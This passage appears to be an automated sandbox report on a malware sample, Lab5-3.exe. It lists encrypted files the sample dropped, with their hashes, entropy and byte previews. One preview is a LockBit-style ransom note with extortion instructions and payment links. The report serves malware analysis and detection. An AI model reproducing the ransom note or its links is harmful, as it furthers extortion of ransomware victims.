                                                                                                          Preview:.ua)Z...4-<H..p...nMeI`...ys.C.......u..5.+.J....s9.....w...k..G...l...Gu.5+.E.w......A...N.}.-.3L}..t|G...CS.........:....G:.3[]k.6S..8M.....V..N'..nv..mg..SJ.oAH.V.Ri....x.K...h.a....t..N).(x..SP...(..n=.......^..#II.B...s..:ee.F.]..9...~.......~.Z].j..7.V..8Z.....+TD..|..8.......N.u.p...U.......h....YW2....A?....c...R.Y*..?.....nF.q*-q4....:TLlo"...0.c>.Kx....&..<N...R..%......T..a4.CK...=..3.B[a-....1.u.Q..^S........./..V..U....?.9.i...#t:.!.........]D....../..U.[.`....Vh..fW.D.[...J....?%.....CY."...I..9.......PA".G.K.....J.-.U33.....G8aN%!....N.I.d],......}>h...._...A.]....\J......uV.P}>.A...Yn.M..X<Q..(....`..V....z....>.....1l`^l...]|}B|.....^.M.F..|...O.:...x.x.:.<2u1..a...v......i..J....H._[..Y/.ibN.{..l.....z..V....^.J.9...u.....rE.>]>j....'.@.-Tv..1m&+.-.h3p.....;.f...$.h.......Q'....T..{.m-q.?].......4...Q..#..m...CqkI.J...M.a...$.+..6)..{..5..I ...;c-PF.>..LSpU...+....}.@.jK.3...k9.?H.....C,.O".|.k..J..9x....YHSmG.L6.3.b3......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.927953631734651
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:luFBNPeFihoFs3N/HuBIjHfUTid3hBaUoSGFcmeykEdEElU92i:2eF6N2BIwGx0uKeY2ElUJ
                                                                                                          MD5:4107D05C3478779F1D49E0640A9017B6
                                                                                                          SHA1:549FF92EAFE66FA4B40410FC89E8E985B6FDBC8D
                                                                                                          SHA-256:6943CB7A47CA64C3A6CDAB1A608D02CDCE6C52F58B6900CDCA4BD2B17F3AFE7D
                                                                                                          SHA-512:49A99CD9F3C809B487721AEC2F605FC0EE2F4F46C078080706852EEF1ABEB1E607E092ED094142BC76A1FAFF3FF4EA8C40FE49534FAEF23FC47897A29C140609
                                                                                                          Malicious:false
                                                                                                          Preview:&J.H0.oD..-(......fK..g.'..U.`M.h.....g -w.>Gy~.1{....x.....?w..a......D..5.A1....,.*.4.zK$....I..~f.'.W.N.0....i......n.....<..G||....k.<.."...B.O.\.G.T.~f=`X2m.&d.|.#..\v..#........=.t.|s...3d.v...H......Z..B~....V.....?..U.......BEU1.Q...Th.w...7.!:^.....,....Nc^...v*l._m.0..".........aN..6..6R.R...)..Q...........A...9_c..n....y..0/.......}.p...>..P=.R ..........jB.b...K..;.....I.gS..f+VA......t...A..!0...$..D`h...........4.-...c...[.i.XO;/.d..F/......N.. !....NW.....o..=.S..r..>:cJD..I...=.........(......._0....6../5.k%.../<....]..PF.O.......zZ.)..|!..aX.[l.o.........y.....+..v+.........|`M?_.6...b.|^....\..P.;t..HW.^hx...%.|.....v.d3]...bM..d.3yA...g......,.E..-....?.`..Hg.QU~.|...\{.`..S..Xg"..$...;=J.Xd.F.#.S...8....(.u7&....+.3.y.\../,z.0r..5.\.b.U.n.oCv#...h..B....|o...56H.*4...R..S....K+...P..q..Y .@..pBw.L.^i....l#....J9Z.p$.gU3.. |j..@t...Z...|R...}v'axC0 .....n..<F......./E../......oc:2(...4z.>...'M.".Xe8.k.L....>.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.924758969787955
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:g0w6wdPyvxLrYxOdbel4nMsenJfepS4+BHfUTid3hBaUoSGFcmeykEdEElU92i:g0hga5oxGMseJfiS4+CGx0uKeY2ElUJ
                                                                                                          MD5:E4377F1F63400F84E628E55FDC8BFD34
                                                                                                          SHA1:1A5822174FC965D510624020AB7E1DF11343FB20
                                                                                                          SHA-256:E3B1BB98D4A152D98A8E826D602408047E35D3E2BA8CD15825197A057C734AA9
                                                                                                          SHA-512:226E26FF92EE8EC3594ABAFAA7BEA63CE24C40F8B06DFCE976EEE830440E1D1F2EA5703345E1155E823CF2B85161680DE90D87A6590FC1AC2332D1075B4CFE2C
                                                                                                          Malicious:false
                                                                                                          Preview:._..."F.(.#..u... [.R..[.....1..I.o.....g..1s%ZJ.=|..."...w"D.P.#..-?.;{1.n*Fc..G<R..6.....E...ue......S..~+k.7.e86..p.5u.q.`...7;...E."v.%T.._W.T..S.Wa09;..t.|.{.!.....9.........X=.... .Q...4....Z..'..i.Zc......0F..BT.....,.{.E/....Wfw..BU?.kn.W....(.>..l........f_`.w.....d.d..|.'s.-2D.....x...%S.lIv.\...}......N6.4.0*...=.....FPr..?.Zh.Bi|.g.......V.[..8_..v...0|..<.........if..i...~......$...P..7.=..0..M...*Z.. .`{5..e..C.._BIjGl...M-G.f ..R}M.."{....Lw..:-K.`K.y.AL.W.#....`..K#_GL9*.*.).;/...?B..f...].....E..-.-....B.P._.?8....m.+$..~...O..0"K;"W.0..\-+qT...../.N....$i...b..w....C.uC....s)....2.f..9.K...).-.jXW.S......,.k.j<...b.?.^.....+...w4C[...!S...M..7Wh._....].fQ..*..iJ....S_..g.}67..K.0..y5..].n.>I.....]@tM#.b....'F.O..~....y.-.....@.X0..Y...-%S.....F.I.E.P...o..`.:..=...[.h........L.._.^N.T.%.....T-.nR..c`f...T..8.....9.&x..N$.......x.]8..Q....f./Y...C..^V.ow..>F.@..^..z.i.Tn.Gk..c.....?..CDXC.5].8..z.o/yd....A..-...B.C..H....x.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.9275927095329575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:kcVSdayEUodno+Tzgi4oQ3ZZM1PHfUTid3hBaUoSGFcmeykEdEElU92i:kcVQaLnFjB8rMOGx0uKeY2ElUJ
                                                                                                          MD5:356BAC9FDEEF1450E0B380DF3F7DD3A3
                                                                                                          SHA1:B20267A6DB84A52F6629B90847D21679B5375DEC
                                                                                                          SHA-256:5DA406A44B6D440AD4287F3986401A9362EC8138B0F778C12892EC2B87B95C68
                                                                                                          SHA-512:97365F5065592878ED8C3261A82D4D64066FA996BFA2D5E3F7AB25A665C7F021FE24CDA7675057787678C8E28BDBAB0733D9CC9FB6D02448946AEA440A333512
                                                                                                          Malicious:false
                                                                                                          Preview:..... .;<..hk......B.b.s....Bz..Ao. <C......=.....O....b.....@..]..B8_Q\....Z.5..}~......."H..5vS.`.Z.>dj.r...R....da........vp...?..<P.3.25`0[..f].N.gX.".b4.*.'(jg(..Hst..k.6X.......o(y..B..<.t....8^.-.......a:....<..|.....mZ..A.,...G.4..6.X..U...`.y.%..u..$8.N..~..\.\.b...........V...Z.lu1..G.d5Lt......~9.$..|".n.{..*cTbb!.>....p.U..K**d..G0....(..._.E.c..*.-2..b......}n.....N..|..i.x..+.@=....m^.....=...<.m;%zR;..6.._b ...,.....>p.......Tdo,..:.c.H.+B....pi.A.....b.z.420<..0/..>>J.NC..m._T3.F...#.6>..bI...u..:.....B.V2.%...5.K.....8Zqv.i..zwj...i..J.KR7{^.pV.s....x.u.'`~^..$..<.c,.<Wv.......#...>......L...z...X.185..)...\....T=9.zaT...y.cMH....)jwq..).@.....^.p[.5)._....t.)!....M~..$.Ax:..)..v..$.w.A...g{..=9.i...%...F.K......uy.^4[..r....."f...1.........+...+.q......6..&...uq..Ql.^.g.\.......'....|.8k.#.e.0>....3..q....]C.GSu..F.s.A..\..........(........t......Y.....a(.......I..7.J....&........>..Q..q...A.`..o7.RZ.....!..<hc
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.924823812593206
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:MoO8FyWum/vmaDp+qmBDzJe9XsHfUTid3hBaUoSGFcmeykEdEElU92i:PMWutaDp+nBP81rGx0uKeY2ElUJ
                                                                                                          MD5:9E0339CD473D47D58F85F50CFE5D1142
                                                                                                          SHA1:6F5D6E6411D0CB3E39E8BA7AB030EA47D73B64D3
                                                                                                          SHA-256:10B485F9F969F7C158E9F7F91F4527E707E024A2C34D86FE8AECB01B0555FD5A
                                                                                                          SHA-512:AC03A0BBDD60FDCA31815C95DD2C478C815D97877465E43829D86E6B57E90C7BF301972D74CB4F0B2406F053E2F166E712CD758773C2D26B8BB9B77A49DA47D2
                                                                                                          Malicious:false
                                                                                                          Preview:....m.w..'.&.q./.R.....Y.....D*......,.Y-...4O.$7.$..wL.[..%.g.^.......F..8q5........T..F..}.*....qK.....6..{.....1......P..e.L..:.$. .[..q*.2....>.}o..-r.)v....$d. ...).......D...`yg..8.F........*....{La..GS=.^e."..^.Mu......2..S....wB8....<o..]...%....39.d..|....!9.(.s/..rR.E......p..b"...q)....Z..U..p..1U.].G.....L_T...Z.N......%.r..(.....zR.ep9aj~K.8..].N.@d........C.7..N...._.......0.2uCB[a......vW..w....P....L.D..x.....f=.s.._...$..d..-..:.C../.......;...M.w..Dn..y..;2........ZZ.=.k..."......(CV.!......H|[....v..h./...]+......^....n.....>.>..pd ...-.\..B..........$........0..Bh#U.g&Gg...W..O.......<...y.....;..RC..s.[.V...bg.W;.....b2..T.x;.G<..v..9.f>..PL`...t...&iQ9.U.(e.....$..:..oeg....z.u:.M..Y`.........X.z....{.l.[yYr+6....x...m.n.Y..].9M.#.....u..#~g!...TY..e..'....O..[H...\1S.0....z......\..&<AcoOn|.ET...T..r.X..q`....;:..b..L.............H..ba..[.]5.8.....-..h..(B8....&...8m.(A,..=Q....#.=k .T.....A...*.V.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:MPEG-4 LOAS
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.934543147072133
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:DOvL8RlZckcCrlsiLuTps4fRCzus75HfUTid3hBaUoSGFcmeykEdEElU92i:gLs3ZRNyNtU/eGx0uKeY2ElUJ
                                                                                                          MD5:E31EC886A659E4E19EDF8DC308D7C2EB
                                                                                                          SHA1:92AD792AEA116CA4CA66269B716E98A05F394031
                                                                                                          SHA-256:B5DE79A561BF3E77F33F762B747D0C89F3A31A72180B3940F67009095E1B6382
                                                                                                          SHA-512:09611C25EA7534D62040BE5A79D9B073AC8C0688A3CF02DE8912A91951F6FD8C21D13E05F5598B5D6AF7F4F0C225EE8E1C0EB24A5E4415042146198A2E213CB3
                                                                                                          Malicious:false
                                                                                                          Preview:V...$$......H.....W(.;n?.N.x......*..:..%'6Aw...................k.....<...a.X)n.?&P.......w?Tg6.^.d-[G................a/p.m.s...?.;....p@...T.m....].8...8K.^....&G,j.'..U.m.y..j....>..rZP.h..E.o..u.Cb..9....|..X:...v6g..........m..\.........O.#.......&.....z.pi.\.uUR.k....Og....J.l...W..T.JYp'7......n7..@.f ...>.).@...Y......A.(&...c...z.1F......;.....oE...[D:9...?UL6.-N2...\.C.pS...'(.iF5..;!+..N<....Z.0.. ..r..."c.g........'....!.._.e..-...a.o.....c......$.l(.L2%..v...6.!.>}.+4......."2n..t<........%'....#R.-.......<c..{..R..ow;.{.q~Bp.z.3.._A.k..tZ.,..=...d.L2f...L........d....a...........V=......Q..BUR...4.T..........5.M.U."1x?........LG/j.MO.....9.L..~.8o....C.../......K9........^.t9J...x>[...aV.......r..'...;!f@Q...b.Z.c..A....dS'.G.d(nXp.....N.C.Z..t.6..u_]PB..5.).@..2.V..."D....>...>.../Q...-..u...g.R..`....B.'.....L.a.....{.......v[.....E......{...W..X..j.u..6..{..m.f.P...F.x4.......s$.M=.`../.......K.!.7.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.927547697943123
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:essT92kwwpHYCYbemSKPjKuHfUTid3hBaUoSGFcmeykEdEElU92i:esI2kwpCpmHPjCGx0uKeY2ElUJ
                                                                                                          MD5:96636CD613B735808719F38473452FFF
                                                                                                          SHA1:59E0B5B5AC7066E48AD3E83B554830E89B2D718F
                                                                                                          SHA-256:085D33983FB377C8BD644A33E2D7C60CE4E738EF78492336BA75206A91A71292
                                                                                                          SHA-512:4EE2E99FD00AC9D4D8660DD9F72C2791A014E79BCBB37B1EE6EA02FD115D599635EC9CEFE2D14B8703B4C0DC5AEB4A58FCE36038F9A9419791D00421A7D71646
                                                                                                          Malicious:false
                                                                                                          Preview:M.ru.p....X[...<.6....,G...,..U...E.:fc....Rqx.a[.?....Kd...).2..G.@.s........1..>.U...;=n.P.G...fZS...#...Z...s.K5.2-..\.....w..].d@y......F..h.D..mx..pM.~.5t..1Q ..O.......K..........3r..w.........,.8y...4...@,].%..Cu..s...._o...kZOxc&.....E...T.?.!..O........7.RL@y."-.QY6O.H.x;)$../<-...y.\..6..f5..:.o.R.Rr..J9h._T.m3/^..9.~"..SfE..&m..K..L?Q...........d..!.K.HS.o.pq.jzw^..0.\.fRX......:)..X..a`[8...%.`8.......U..)...^{..9K.(..%.{..IC....@@....^b.E....4.Bv.....e.........'...c..}./0(....k>.Zr...x.w.^..T...|9....bS....Q.=E?..Rb...iE.v...1.8^t...3v.O..W0..Mm.../...QmiM1..l|6.....t;.1..)..<s.G..F...O(..<..r..9ZA31VTNL.r....r^8Q...=.+zr.....c.u.....&.....p..q.C..f1...Y'.&.B.t.\Z.C...;X.zn....E.w'.9.}..9.m...A...$)..8..z.-X....*M.K.hr.F..T&@...U.".k..7......e......xCau.G...#.P..#..Z.oAz}...I&........y..k W.R...'..Wn....l.z(....b.....#`...5.Q..q...r.....I~..+..s.h>.......)..j@5_...y...j>vd....>._...4.<...%........Cy...I..1... m.....m...`..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.930203796274331
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:s9Nu3Qp9hoo8LsNdjwh77awhHfUTid3hBaUoSGFcmeykEdEElU92i:yNl3hMsNdjwViGx0uKeY2ElUJ
                                                                                                          MD5:537107E31B4071F65F1764427799EB33
                                                                                                          SHA1:D57E1C9130816F0BBD5507074C1DCAC97F9DA0E4
                                                                                                          SHA-256:21C7D4C94278B5267AE99D347CEB659C36C3A9D4FB58D6F783030344830775DE
                                                                                                          SHA-512:46C6D2DF550A52E7523DF7B4F28D7A0977590C44336CC9CE74B13A6FBAD5A5316B9D6402006F416EE3570B6612620754C0BA53424265B2C6DAF37CB63EE25476
                                                                                                          Malicious:false
                                                                                                          Preview:...;....gE.$.....P.T+`.O..YX3:.Y@...!....D..'...o..<*.Z.R9..m..O....,<..H..*3..fI.nm..Q:.C...l$.}.3:...>.6.......s_...=..F.![-.s.....9M\.:.y..n._....\8q.....=.Xp@....Lr=...z._bJ.Q.........o7..U......e..6. ..~.._..Y.;...i....Y...d.e .}.....,.X..Dt.U..*.kE.L..zbQP.....g...:@...f.G..P#.?Mf....H.VC{.......6..@6...N...J..:....F$......P?.5N...F.0........K..7.,.1...ZWA.;y.V..:.oJ.ij.....9.g..B......}"^.Ud.".pI...P(=wY7n..s2B......g".....g....?D.........0.m....X.k.P...".:$.g.WN..J....*.oB..+.D...^.g..0~.....&..1?..z..L..j5x7..R..m....nM.....V..]...W.....1.....|ny{....e.fD.p...M&.k..L..[.!O.[=U....Gm.m.k.....2.j......Y.......(.f.8-.....g}..4....y...$..xR,".b.(...;!....q..Z.s.tA/....jI...>g.!o. \...... A$T...+v.'..x.NO.G.`.'@t2j......_..Fc_.).-.v}......l`.u.Y..wE...~.{. t..`.v...H.~{....v~+.+.+..Ny.@.43...R3....z.....l.!.aw+..h..,.S..N.X........=...0.0.^2..B..MJ..........u.n..%N....p."Grj.r^.......v...-....V.A.....RC,,`B...W(*....%.3{..#...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.92701476310856
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7TwJpTxZt4Vl1O48IHfUTid3hBaUoSGFcmeykEdEElU92i:7TmpNYVlaGx0uKeY2ElUJ
                                                                                                          MD5:3367C6ED40B0194E3507E8B8A3440BC9
                                                                                                          SHA1:C287E80A91BD11FBA4085F6EE7F5A37F790A78E8
                                                                                                          SHA-256:0FCF02EFC47AAE4D889FF7F990C06E9BD2AB18F7863D7F2028DFC27D610E6485
                                                                                                          SHA-512:779E9589E2DCF748B30CAD2FFE0F96291058D81716407F45F2A9977706ACD932453B5BE104FBCE0203FB4696CDE828DB413065D4E144D7E87C2105E206650911
                                                                                                          Malicious:false
                                                                                                          Preview:I.q.9{....I..2.G(B..%.lw....k.p iG.b...-B.A....O.\.>.Y....i.!O...;(.......=.A]E..A...c....nD_.\k...)@a?OPg....{0.3..>%,......V.....|d...N.E@'3...$s.V..1.+..y(.z.%1%......<5al8....Z:..ej.N......7/.n.L..J.J.I...k..V......Wn...F.J...+.....".I.......'...E...2..r..{....<..g.1......'.(....y.....w......~....*..u..=.y5]K/...U.j..V.h.6...]:D......W.~0&..[*2...-...%...n.K.V..F[.azV..W..v.yF.;....d.<.i.f.+..}/rQ...]A[.2:.h}...]...V....bi....|..d. ..a.9Sbn...@...d.g....Qc..M.W.oRn...y..oN;..3..NT.....<....jW..K4.c3..)...l..l...r.3...7<h...1zv.BSfAd2.Xi(.`.oy....-<Q.J,R.+.. ..7.0~..&..d.N.;..x.d..\..;...Z.z@"F....i.b.@..[.2].....3. .h....s1I...6.....O.......G...&....b.G...@...)J..;\..x...;......<...P&..=.D....g..{].RQ/4A....NY$..D..W.H*..~9...CN....+IH.N.o.O........@......o..J.BK.N.#/-Q..^...fG.(.(...9?!^.W....-.08......,'($......z.;.y..T.[.f..H.Y#..|w...1.8....`|.... .|.....]..m..JR.::....'..M...].......MMK..3j..I.~C..e...............g... ..5.."....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.927782173418501
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:5iWEbQrrlAogiqVc/Fh7GZrHfUTid3hBaUoSGFcmeykEdEElU92i:5mbQrrlsu/zGZ4Gx0uKeY2ElUJ
                                                                                                          MD5:270DDBB804E16641D577E9C2EE0DD139
                                                                                                          SHA1:DF5E2C6B1AD043B11C9BC83C61F910A5BEBFE35A
                                                                                                          SHA-256:E61A24C99F5210AA9B10FD31DCE7EF61CB9717FDFBE5BBF8A4FC01633EB40BAA
                                                                                                          SHA-512:FEB0165721775629CA25D8E1779F619E5B054F8FEC15898CEBE5FD69D75861FD5E3CB969A8D44A302C7DA21637AAA3D0D571CC53E8C91B8303967ABEB60F9E23
                                                                                                          Malicious:false
                                                                                                          Preview:.]+.S9.j.&.f.4/.a...U+&.3..`..,.g.~R..u.....k..e.&$.%...l.x'.H..Jb'h...F...F...p.p.7.:...u"...'.....qI.;...|.e.$..a..M+g.K{.V....../y.>V..]9.><...-Z.l..........$..E.'..{.V.._....c3.@.O......-#...8....-Cv|...3....r....Kcv.y......e....)..c_&9g.\..?3R.u.+3r?..(.".o....<..A.........B..........-..8..CY.gm..:.T......7.EOq.b<b.o7...#.`r..\Q.P....,."..o....(.(g!...\......w..O..@U.s+..oz..N.a..C.t;cTK.Bpd[IPX..}fH..&c.'s.......q!A.....S....F..\.u6..../.....-.1...YMp.B.Z..Ru&".2I..+.[......}.......D.I\{......e!p..bE..m.aH..7...TH.a....J....P;}uY.T].Q....qR.g?. ..M..>..w.0.%.....7^..C.u...6AI.Vwt..{...0....z......I..A.8.&.s.^./.z;..6.oy."KU.sq....`T.fY.U_E.=.(.]?,.4v#.E..i.=T........1....r.k....G....m&1...yXB..wZ..:>nb......M...M..@..R!.>b..........iiui.SP.h......3.`.[....4....h..B........... sw^?..Yf%...5..W.....kP..C..uM.g:...r....He5>@....{s........YO.Bo.(.6r.6.aK+'....7|.8fF..3wDD0.+....G.HV!...\......].}....G..M...u......'p=.G..DD....3.e.^cV.n.Fj...Q
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.927490856232379
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:itBnOwnhCUEU/fVHJPz8d51tAVsHfUTid3hBaUoSGFcmeykEdEElU92i:iLnOwnhCtUB1gZWtGx0uKeY2ElUJ
                                                                                                          MD5:105023C2740904069592A9F5457FD26D
                                                                                                          SHA1:508E43E95279E0AA79AD6E69985ED4DF2E84416F
                                                                                                          SHA-256:2CE6D015D70F4057F7FA1330E0DD3DFAD8141A977FE2D13C861875734EEA378F
                                                                                                          SHA-512:84594C201AF59F41CEF7618C21FF7E184AF1568EE89202F1E60E6B9E60F20B8F67A06316F29283A47676C0228287F9A44B04878E5959721DF2EDC5F189E32364
                                                                                                          Malicious:false
                                                                                                          Preview:.u.(..(3...35...F..M.S.L+.!....^.......@......*X[.T..0..$'v4.7..!.2(.~kO#f.$...P.n7w.LA_.....^..Y....|_Q.y..Q..c}x..J.:..Y.'q..0..QQ..&..Io`~.M..m..!...7Y""..;.4....}..~...p.\....s.uR.....b>-...0...aKcs)1@..i.7.FO.l...6..`=..H...........V+....&UX.......C-Q...g.G.....g...*.%.E[j..E..........:......3E....o.1...".N(..w.yr..9.a.nk.|.\.Q...-..Hb..b..dm.^..t{.}.u.C......_..u@u.~.X.u.C..(.....==..*...T.2.;x...xf...$../..1..r..h....9.F.....T-.U..a.UR[o.4{..;..t..Un.a.g.1.^)....;$./}......Y2q...IY..<R..L[-..bF.E...W.ti.kv...............-..@i....4....\..Q...3r..5..W..b.....q...1.H(JR.Y...u....Ju....(......P_}E.{.....*&.D.....}.|.Q..B.C..e.=..}d.b7H....En._.....~j.U..NA...{z2....V..4.g..D...V.Zk|`.I......+pZ*.........5Y.[2"}9xD.'..........[.b.,P._...&.PM.lM.H...]..z..B.5R`..p..K.d.m........K.._..hv[.&8..'dJ!N=b..[J...INb....f...W..}7<x..wE^4.W.U&....0].;{ef...."%..).Y....Q.7..9c....U?.....z....-...[.....%..r.t.c+..I.H..;.....G(.##o.,/.f)b
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.931727431172815
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1r7LLmbpAslX7ZWBmv9UGbx/HUHfUTid3hBaUoSGFcmeykEdEElU92i:FLOysHv9UGbhTGx0uKeY2ElUJ
                                                                                                          MD5:59F94EF9FB7DC089FDD071D8E0A49BDE
                                                                                                          SHA1:0AF6FA2792958086264A27F209D42FE208B6FF55
                                                                                                          SHA-256:E82EA70CF432190B18AAF73DF5107224590565A4DD8F5C1F1B217272335DE345
                                                                                                          SHA-512:21069CCF33954821F33C2DAEC754FD134B9317DDA3AFDBC156DFF3C3A2BA4232042D7159E380E445BE75842D0EC3BF60367AA323A47558A0F4F35B1007229D50
                                                                                                          Malicious:false
                                                                                                          Preview:V.&.....&.+...H...Z.....6(U/..C....9)}.B....Z../.n...SC..q...,.q...l.%b..>Q..W.......m.&..r..:.|....N7.DD3....D.&.y..L..O..xCg[..2...O.d.......5.X.q..G.y+wb..."`......A....,.5.0..H..E$.'.N.{....\.P....C....&F...aIX..5..Y.A..cU.VM.lk.\.T.;.,+d...'...K.....o7Ei....zD.R..;..|\O.....:)..k.._...?W.d.......>.%.i.........i.c..^.~...8.U.\!."..be...e..k.x.`GqN8.<.d..~..`.[.....X.....!..q..k...3.........0.i1>.K?R..b...k...5.<.N....=V.......)..pI.v.$.+....1.L.e.}.........+(....`...4.#....!#.....-..(....w...F.]?..2.....A"......^J.]Or.O....m.\.:...(.|=]..l..[..z.Lx9........_&.6. ..j2.{.4.Q,..jV:.6.T...e.m.......x....m......M...&.pk..n..3r1Y..............Hn.v..nc........P..\..L~..`8.".....Eg......|..`....H.ECh...."..{X..N.....%...lu...A.jM.'....-....nw.}4.p...xU...Z.n8.J..z.x|..k.G`G..... .............h..?zi.L~.R.2.Q.9.Tey[.,.y.....8.l... .....W....t.....\..K.Y...B.)...XQ.H.....$.r....C..U...#...............U..r.>.....(...P.;...(@.#..zd...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.943122134443165
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:NjIL1jP8YI6XSPI78CtdrbIHfUTid3hBaUoSGFcmeykEdEElU92i:Nj0ju6XSPII4nGx0uKeY2ElUJ
                                                                                                          MD5:87DF9F4E525C973882178925C48E164E
                                                                                                          SHA1:64F4F00D8218D280DE249EE88DC844EB21482516
                                                                                                          SHA-256:FADFF5EE2AC93116F776F0A0235142B144807E132AA9FB277285019B3B1F0769
                                                                                                          SHA-512:5C8056C2DDDCAF1DD70006E9248E33678405886D38693DEE5780F4AFD560414E20B82BDA85FB8EB69575620031BB6C29AB8AEAE15CE45715E20BD3F48CE6BE17
                                                                                                          Malicious:false
                                                                                                          Preview:.T.#E..mx&...Se........0m....F5.q..^.TG.P.IF.2I......5.R.^.jk...r.....+qqZ..g........K.....z........C.:.&.w G..5.....}.:...c./.>..QN....8nlaR.......#.......^.^....@O.!.....8..A..'..L.C..x.......S.F.@".Z..ya.s...^K..`az,.[.>....pEw1..&..d!.M.4....h?-.}..ZP..;.e$H../@.k...w.A.]..q.B.P.....e....$.(..D:.N....i.mh.'..'2...:z..........+.%..~.W8..l...'......0.,U..}....B...5.r..gM.....^.k.R.7..N..)>BM.....l......:...Tk..W... `..?..C...8...QK.....&"..5}i.q../....6c{N..I......w<.6...\....J.-<.P5...T....q.'.t..S..2.[\......S..T..#..pag.'...w.y=.. .K.U..p.].....6/..p....".4.i......ytbC.tP.ulX@.GL.../.'M7.;...L....?.h(.l.y._....l.;.m._..;#%^0bN.E.lC...!_...D0.R9.e~.4..N.@..`....E!..]..'.H....x......_6..mS...2L.......<.....g.F...;v.*...x....E..s.aq.).>9.,$Y...$....s.+...&..z..h...n'.....9y....s.".@a.H.`n.\.O.ue..=..L..B\...%._.K.&MR..P...Lz5.D.e'..`.....Z.q[......z..Ah..;]_!...X...^"m>........~. ^.n.._5.:8R[.)G_.%.r=.....J.P.).w....h.q.p...=_
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2592
                                                                                                          Entropy (8bit):7.940622790851073
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:g35F/bWg6yQEgyx+fiVw8iFwHwHfUTid3hBaUoSGFcmeykEdEElU92i:wFzWg6y+fiiVFwXGx0uKeY2ElUJ
                                                                                                          MD5:ADB4F7DCDAF19F42F17B511D95B83237
                                                                                                          SHA1:C7B5AEF5D322C311EC869577407E76DB92A71BBA
                                                                                                          SHA-256:A257FC5CF5D25005EE4B2F668F401762D7FD62D8BDBB38A45CBEBEBC0EAA6B03
                                                                                                          SHA-512:FFDB56DC94F22C1AF4AC62C0A69480B50121677507C9C37CB0AB4EC243133DB8DC523FA8CEF720C30A26894ACB5AC80E4469C8CAD92BA8C83A31D3D4B80F9CB8
